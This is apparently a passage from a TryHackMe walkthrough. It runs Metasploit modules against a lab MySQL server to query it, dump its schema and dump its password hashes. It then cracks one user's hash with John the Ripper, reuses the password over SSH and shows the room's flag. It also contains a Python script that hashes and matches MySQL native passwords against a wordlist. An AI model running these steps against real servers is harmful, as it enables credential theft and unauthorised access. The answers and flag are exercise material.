Your MySQL connection id is 3
Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2023, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>
Okay, we know that our login credentials work. Let’s quit out of this session with “exit” and launch up Metasploit.
root@ip-10-10-35-22:~# msfconsole
This copy of metasploit-framework is more than two weeks old.
Consider running 'msfupdate' to update to the latest version.

[Metasploit ASCII-art banner omitted]

       =[ metasploit v6.3.5-dev-                          ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 410 post       ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Adapter names can be used for IP params
set LHOST eth0
Metasploit Documentation: https://docs.metasploit.com/

msf6 >
We're going to be using the mysql_sql module.
Search for it, select it and list its options. What three options do we need to set? (in the order they appear in the options table)
PASSWORD
RHOSTS
USERNAME
msf6 > search mysql_sql

Matching Modules
================

   #  Name                             Disclosure Date  Rank    Check  Description
   -  ----                             ---------------  ----    -----  -----------
   0  auxiliary/admin/mysql/mysql_sql                   normal  No     MySQL SQL Generic Query


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/mysql/mysql_sql

msf6 > use 0
msf6 auxiliary(admin/mysql/mysql_sql) > options

Module options (auxiliary/admin/mysql/mysql_sql):

   Name      Current Setting   Required  Description
   ----      ---------------   --------  -----------
   PASSWORD                    no        The password for the specified username
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     3306              yes       The target port (TCP)
   SQL       select version()  yes       The SQL to execute.
   USERNAME                    no        The username to authenticate as


View the full module info with the info, or info -d command.
msf6 auxiliary(admin/mysql/mysql_sql) > set USERNAME root
USERNAME => root
msf6 auxiliary(admin/mysql/mysql_sql) > set RHOSTS 10.10.151.196
RHOSTS => 10.10.151.196
msf6 auxiliary(admin/mysql/mysql_sql) > set PASSWORD password
PASSWORD => password
Run the exploit. By default it will test with the select version() statement. What result does this give you?
5.7.29-0ubuntu0.18.04.1
msf6 auxiliary(admin/mysql/mysql_sql) > run
[*] Running module against 10.10.151.196

[*] 10.10.151.196:3306 - Sending statement: 'select version()'...
[*] 10.10.151.196:3306 -  | 5.7.29-0ubuntu0.18.04.1 |
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mysql/mysql_sql) >
Great! We know that our exploit is landing as planned. Let’s try to gain some more ambitious information. Change the sql option to show databases. How many databases are returned?
4
msf6 auxiliary(admin/mysql/mysql_sql) > set SQL show databases
SQL => show databases
msf6 auxiliary(admin/mysql/mysql_sql) > options

Module options (auxiliary/admin/mysql/mysql_sql):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  password         no        The password for the specified username
   RHOSTS    10.10.151.196    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     3306             yes       The target port (TCP)
   SQL       show databases   yes       The SQL to execute.
   USERNAME  root             no        The username to authenticate as


View the full module info with the info, or info -d command.
msf6 auxiliary(admin/mysql/mysql_sql) > run
[*] Running module against 10.10.151.196

[*] 10.10.151.196:3306 - Sending statement: 'show databases'...
[*] 10.10.151.196:3306 -  | information_schema |
[*] 10.10.151.196:3306 -  | mysql |
[*] 10.10.151.196:3306 -  | performance_schema |
[*] 10.10.151.196:3306 -  | sys |
[*] Auxiliary module execution completed
Exploiting MySQL
Take a sanity check before moving on to try and exploit the database fully. We know:
- MySQL server credentials
- The version of MySQL running
- The number of Databases, and their names.
Schema
In MySQL, a schema is physically synonymous with a database: you can use the keyword SCHEMA instead of DATABASE in MySQL SQL syntax, for example CREATE SCHEMA instead of CREATE DATABASE. Some other database products draw a distinction between the two.
Hashes
Hashes are the product of a cryptographic algorithm that turns a variable-length input into a fixed-length output. The hashes we care about here are the password hashes MySQL stores for each account in the mysql.user table (the authentication_string column in 5.7). The mysql_hashdump module below reads them out so they can be cracked offline.
First, let's search for and select the mysql_schemadump module. What's the module's full name?
auxiliary/scanner/mysql/mysql_schemadump
msf6 auxiliary(admin/mysql/mysql_sql) > search mysql_schemadump

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  auxiliary/scanner/mysql/mysql_schemadump                   normal  No     MYSQL Schema Dump
Great! Now, you’ve done this a few times by now so I’ll let you take it from here. Set the relevant options, run the exploit. What’s the name of the last table that gets dumped?
x$waits_global_by_latency
msf6 auxiliary(scanner/mysql/mysql_schemadump) > options

Module options (auxiliary/scanner/mysql/mysql_schemadump):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   DISPLAY_RESULTS  true             yes       Display the Results to the Screen
   PASSWORD                          no        The password for the specified username
   RHOSTS                            yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT            3306             yes       The target port (TCP)
   THREADS          1                yes       The number of concurrent threads (max one per host)
   USERNAME                          no        The username to authenticate as


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/mysql/mysql_schemadump) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set RHOSTS 10.10.151.196
RHOSTS => 10.10.151.196
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set PASSWORD password
PASSWORD => password
  - TableName: x$waits_global_by_latency
    Columns:
    - ColumnName: events
      ColumnType: varchar(128)
    - ColumnName: total
      ColumnType: bigint(20) unsigned
    - ColumnName: total_latency
      ColumnType: bigint(20) unsigned
    - ColumnName: avg_latency
      ColumnType: bigint(20) unsigned
    - ColumnName: max_latency
      ColumnType: bigint(20) unsigned

[*] 10.10.151.196:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/mysql/mysql_schemadump) >
Awesome, you have now dumped the tables, and column names of the whole database. But we can do one better… search for and select the mysql_hashdump module. What’s the module’s full name?
auxiliary/scanner/mysql/mysql_hashdump
msf6 auxiliary(scanner/mysql/mysql_schemadump) > search mysql_hashdump

Matching Modules
================

   #  Name                                     Disclosure Date  Rank    Check  Description
   -  ----                                     ---------------  ----    -----  -----------
   0  auxiliary/scanner/mysql/mysql_hashdump                    normal  No     MYSQL Password Hashdump
   1  auxiliary/analyze/crack_databases                         normal  No     Password Cracker: Databases
Again, I’ll let you take it from here. Set the relevant options, run the exploit. What non-default user stands out to you?
carl
msf6 auxiliary(scanner/mysql/mysql_hashdump) > options

Module options (auxiliary/scanner/mysql/mysql_hashdump):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     3306             yes       The target port (TCP)
   THREADS   1                yes       The number of concurrent threads (max one per host)
   USERNAME                   no        The username to authenticate as

View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/mysql/mysql_hashdump) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set RHOSTS 10.10.151.196
RHOSTS => 10.10.151.196
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set PASSWORD password
PASSWORD => password
msf6 auxiliary(scanner/mysql/mysql_hashdump) > run

[+] 10.10.151.196:3306 - Saving HashString as Loot: root:
[+] 10.10.151.196:3306 - Saving HashString as Loot: mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] 10.10.151.196:3306 - Saving HashString as Loot: mysql.sys:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] 10.10.151.196:3306 - Saving HashString as Loot: debian-sys-maint:*D9C95B328FE46FFAE1A55A2DE5719A8681B2F79E
[+] 10.10.151.196:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] 10.10.151.196:3306 - Saving HashString as Loot: carl:*EA031893AA21444B170FC2162A56978B8CEECE18
[*] 10.10.151.196:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Another user! And we have their password hash. This could be very interesting. Copy the hash string in full, like: bob:*HASH to a text file on your local machine called “hash.txt”. What is the user/hash combination string?
carl:*EA031893AA21444B170FC2162A56978B8CEECE18
Now, we need to crack the password! Let’s try John the Ripper against it using: john hash.txt. What is the password of the user we found?
doggie
root@ip-10-10-35-22:~# cat > hash.txt
carl:*EA031893AA21444B170FC2162A56978B8CEECE18
root@ip-10-10-35-22:~# cat hash.txt
carl:*EA031893AA21444B170FC2162A56978B8CEECE18
root@ip-10-10-35-22:~# john hash.txt
Warning: detected hash type "mysql-sha1", but the string is also recognized as "mysql-sha1-opencl"
Use the "--format=mysql-sha1-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (mysql-sha1, MySQL 4.1+ [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=2
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/opt/john/password.lst
Proceeding with incremental:ASCII
doggie           (carl)
1g 0:00:00:01 DONE 3/3 (2024-06-26 06:01) 0.5291g/s 1209Kp/s 1209Kc/s 1209KC/s doggie..doggia
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
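To make clear what John actually did with that hash, here is an added example of my own (not from the room, Metasploit or John) that implements the format John reported as "mysql-sha1": the MySQL 4.1+ mysql_native_password hash, which is just SHA1(SHA1(password)) with no salt. The script parses loot lines in the shape mysql_hashdump prints, flags accounts with no hash and accounts whose hash is the deliberately invalid string MySQL stores for locked system accounts, and compares the remaining hashes against a small banned-password list, which is the check a DBA would run on their own mysql.user table. The loot lines and the wordlist are constructed for the example; the root and carl hash strings are the ones shown above.

```python
"""Audit mysql_native_password hashes from a mysql.user dump (added example)."""
import hashlib
import re

# Constructed sample in the shape of the hashdump output above. The root and
# carl hash strings are the ones shown on the page; the rest is constructed.
LOOT_LINES = """\
[+] 10.10.151.196:3306 - Saving HashString as Loot: root:
[+] 10.10.151.196:3306 - Saving HashString as Loot: mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] 10.10.151.196:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] 10.10.151.196:3306 - Saving HashString as Loot: carl:*EA031893AA21444B170FC2162A56978B8CEECE18
"""

# Constructed banned-password list, standing in for a real wordlist.
WORDLIST = ["123456", "password", "doggie", "letmein"]

LOOT_RE = re.compile(r"Saving HashString as Loot: (?P<user>[^:]+):(?P<hash>\S*)$")
NATIVE_HASH_RE = re.compile(r"^\*[0-9A-F]{40}$")


def mysql_native_password(password: str) -> str:
    """mysql_native_password (MySQL 4.1+): '*' + upper-hex SHA1(SHA1(pw)).

    Unsalted, so identical passwords give identical hashes. MySQL 8's default
    caching_sha2_password is salted and is not handled by this function.
    """
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def parse_loot(text: str) -> list[tuple[str, str]]:
    """Extract (user, hash) pairs from hashdump-style loot lines."""
    accounts = []
    for line in text.splitlines():
        m = LOOT_RE.search(line)
        if m:
            accounts.append((m.group("user"), m.group("hash")))
    return accounts


def audit(accounts, wordlist) -> list[tuple[str, str]]:
    """Classify each account as EMPTY, LOCKED, WEAK:<word> or OK.

    Because the format is unsalted, the wordlist is hashed once and every
    account is checked with a dictionary lookup; that is also why a leaked
    mysql.user table of this format cracks so quickly.
    """
    lookup = {mysql_native_password(w): w for w in wordlist}
    findings = []
    for user, h in accounts:
        if h == "":
            # No hash stored: empty password or a non-password plugin such
            # as auth_socket. Confirm which by checking mysql.user.plugin.
            findings.append((user, "EMPTY"))
        elif not NATIVE_HASH_RE.match(h):
            # Not a valid native hash, e.g. the invalid string MySQL sets on
            # mysql.session / mysql.sys: password login is impossible.
            findings.append((user, "LOCKED"))
        elif h in lookup:
            findings.append((user, f"WEAK:{lookup[h]}"))
        else:
            findings.append((user, "OK"))
    return findings


if __name__ == "__main__":
    for user, finding in audit(parse_loot(LOOT_LINES), WORDLIST):
        print(f"{user:<15} {finding}")
```

Running it reports root with an empty hash, mysql.session as locked, and both root and carl as WEAK with the words the page's own runs recovered. The same `mysql_native_password` function answers the reuse question that follows: hash a password recovered from one service and compare it against the mysql.user entries, or vice versa. On MySQL 8 with caching_sha2_password this comparison does not work, because each hash carries its own salt.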
Awesome. Password reuse is not only extremely dangerous, but extremely common. What are the chances that this user has reused their password for a different service? What’s the contents of MySQL.txt?
THM{congratulations_you_got_the_mySQL_flag}
root@ip-10-10-35-22:~# ssh carl@10.10.151.196
carl@10.10.151.196's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Jun 26 05:04:05 UTC 2024

  System load:  0.0               Processes:           87
  Usage of /:   41.7% of 9.78GB   Users logged in:     0
  Memory usage: 32%               IP address for eth0: 10.10.151.196
  Swap usage:   0%

23 packages can be updated.
0 updates are security updates.

Last login: Thu Apr 23 12:57:41 2020 from 192.168.1.110
carl@polomysql:~$ ls
MySQL.txt
carl@polomysql:~$ cat MySQL.txt
THM{congratulations_you_got_the_mySQL_flag}